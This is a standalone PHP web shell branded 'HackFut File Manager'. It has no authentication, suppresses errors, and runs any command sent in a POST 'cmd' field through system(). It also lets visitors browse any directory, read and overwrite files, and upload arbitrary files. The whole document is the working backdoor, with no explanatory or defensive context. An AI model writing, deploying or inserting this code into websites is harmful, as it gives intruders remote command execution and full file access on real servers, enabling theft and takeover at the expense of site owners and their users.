<?php
@ini_set('display_errors', 0);
@set_time_limit(0);
error_reporting(0);
$cwd = isset($_GET['path']) ? $_GET['path'] : getcwd();
$cwd = realpath($cwd);
if (isset($_POST['upload']) && isset($_FILES['file'])) {
    $target = $cwd . '/' . basename($_FILES['file']['name']);
    @move_uploaded_file($_FILES['file']['tmp_name'], $target);
}
if (isset($_POST['save']) && isset($_POST['filename'])) {
    $path = $cwd.'/'.basename($_POST['filename']);
    @file_put_contents($path, $_POST['content']);
}
if (isset($_POST['cmd']) && !empty($_POST['cmd'])) {
    echo "<pre>";
    system($_POST['cmd'] . " 2>&1");
    echo "</pre>";
}
echo "<h2>HackFut File Manager</h2>";
echo "<b>Path:</b> ".htmlspecialchars($cwd)."<hr>";
echo "<form method='post'><input name='cmd' placeholder='cmd'><input type='submit' value='Run'></form><hr>";
$files = @scandir($cwd);
echo "<ul>";
foreach ($files as $f) {
    if ($f == ".") continue;
    $fp = $cwd.'/'.$f;
    if (is_dir($fp)) {
        echo "<li>📁 <a href='?path=".urlencode($fp)."'>".htmlspecialchars($f)."</a></li>";
    } else {
        echo "<li>📄 <a href='?path=".urlencode($cwd)."&edit=".urlencode($f)."'>".htmlspecialchars($f)."</a></li>";
    }
}
echo "</ul>";
if (isset($_GET['edit'])) {
    $file = basename($_GET['edit']);
    $full = $cwd.'/'.$file;
    if (file_exists($full)) {
        $content = @file_get_contents($full);
        echo "<form method='post'>";
        echo "<input type='hidden' name='filename' value='".htmlspecialchars($file)."'>";
        echo "<textarea name='content' rows='15'>".htmlspecialchars($content)."</textarea><br>";
        echo "<input type='submit' name='save' value='Save'>";
        echo "</form>";
    }
}
echo "<hr><form method='post' enctype='multipart/form-data'>";
echo "<input type='file' name='file'><input type='submit' name='upload' value='Upload'></form>";
?>